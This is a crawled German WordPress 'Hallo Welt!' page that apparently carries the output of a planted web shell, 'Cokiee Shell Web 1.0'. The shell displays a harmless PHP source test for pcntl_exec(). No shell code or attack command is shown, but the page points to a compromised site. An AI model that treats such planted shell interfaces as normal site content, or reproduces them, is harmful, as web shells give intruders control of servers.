Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/pcntl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/pcntl/tests/pcntl_exec_3.phpt |
--TEST-- pcntl_exec() 3 --SKIPIF-- <?php if (!extension_loaded("pcntl")) print "skip"; ?> --FILE-- <?php var_dump(pcntl_exec()); $file = tempnam(sys_get_temp_dir(),"php"); var_dump(pcntl_exec($file, array("foo","bar"), array("foo" => "bar"))); unlink($file); ?> --EXPECTF-- Warning: pcntl_exec() expects at least 1 parameter, 0 given %s NULL Warning: pcntl_exec(): Error has occurred: (errno %d) %s bool(false)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare